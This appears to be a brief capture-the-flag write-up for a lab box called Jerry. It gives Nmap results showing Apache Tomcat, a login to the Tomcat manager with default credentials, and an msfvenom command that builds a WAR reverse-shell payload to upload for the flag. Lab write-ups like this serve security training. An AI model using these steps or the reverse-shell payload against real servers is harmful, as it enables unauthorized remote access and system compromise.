# Nmap 7.92 scan initiated Tue Jun 7 11:38:57 2022 as: nmap -sC -sV -oA nmap/Jerry -Pn 10.129.88.89
Nmap scan report for 10.129.88.89
Host is up (0.33s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/7.0.88
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jun 7 11:40:24 2022 -- 1 IP address (1 host up) scanned in 87.02 seconds
Navigate to port 8080
Navigate to /manager
Login with default credentials tomcat:s3cret
We can use msfvenom to generate a java .war file reverse shell and upload it to the Tomcat.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f war > test.war
New application inserted!
We can navigate to the Administrator's Desktop to get the flag
